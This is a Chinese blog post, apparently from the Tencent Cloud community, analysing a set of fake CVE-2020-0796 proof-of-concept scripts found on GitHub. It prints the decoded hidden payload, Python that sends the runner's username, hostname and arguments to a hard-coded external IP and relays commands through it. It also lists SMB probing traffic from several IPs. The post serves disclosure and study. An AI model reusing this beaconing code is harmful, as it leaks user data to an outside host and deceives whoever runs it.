瞎采新闻 0x01 事件起因
昨天早上9点左右逛github时,我发现l33terman6000一次性放出了最近热门的7个漏洞的poc。
0x02 事件经过
兴奋地尝试CVE-2020-0796之后发现,好像可以啊!
仔细一看我发现7个脚本中shellcode完全一样。
Shellcode解码看看。
得到了如下代码:
time.sleep(3) lhost = os.uname()[1] command = getpass.getuser() + '@' + (lhost) args = ' '.join(sys.argv[1:]) ErrorMsg = 'Connection Terminated: (Timeout)' URL = http://54.184.20.69/poc2.php PARAMS = {'host':command, 'args':args, 'cve':Bug} r = requests.get(url = URL, params = PARAMS) welcome = r.content if welcome != "": rsp = 1 while rsp != "": cmd = raw_input(welcome) PARAMS = {'host':command, 'args':cmd, 'cve':Bug} r = requests.get(url = URL, params = PARAMS) rsp = r.content print rsp welcome = "C:WINDOWSsystem32>" time.sleep(10)发送参数给54.184.20.69/poc2.php, 做的全是和poc2的交互,相当于poc2.php做了http代理。
敲ipconfig之后返回的IP信息在54.184.20.69/ip.txt,其实都是他设置好的。
经过尝试,发现执行dir,whoami,ipconfig都会返回他设置的信息,如果执行其他命令如:ver,shell就会断开。
我是在本地执行的,由于他的poc无法打到我的内网,导致poc2.php中的”真poc”没有触发。于是我在Ubuntu vps上进行实验监听了445端口,还真来东西了。
抓包看看,120.244.60.215来了一堆SMB2请求包,和Ubuntu协商SMB失败。
之后转发内网win10 445端口到Ubuntu vps的445端口,因为他只会访问445端口,怀疑有真CVE-2020-0796poc,之后开始抓poc。
然后我再用假poc去打公网的SMB服务时,执行ipconfig会返回vps地址,网关都换成117.51.142.1,相当逼真。
然后分析SMB流量。
第一个包:协商SMB版本 第二个包:尝试用户名为.密码为空登录 第三个包:尝试对192.168.0.18IPC$连接 第四个包:再次协商SMB版本 第五个包:尝试SMB匿名登录尝试 第六个包:尝试对192.168.56.20IPC$连接 怀疑是等待时间太短,之后尝试等待30分钟,vps445端口大概20分钟没流量之后关闭了连接。
可以看到又新增了二个ip来访问SMB,不过还是相同的六次请求,2次实验,共来四个不同ip进行访问,每次指定两个ip去进行IPC$连接。其中发现一个公网ip,其他都是内网ip。
公网ip 62.234.15.3 并没有开SMB服务。
telnet公网ip之后,越来越和poc没有关系了。。。
0x03 最终结论
1、两次使用poc对比
内网使用poc打的话,会返回他设置的54.184.20.69的信息,和你的win10靶机没有任何关系。 公网使用poc打的话,两次实验,共发现4个ip来对靶机进行SMB访问,全是国内ip,每次尝试对两个地址尝试IPC$连接和匿名登录。
---来自腾讯云社区的---PaperPen
微信扫一扫打赏 
支付宝扫一扫打赏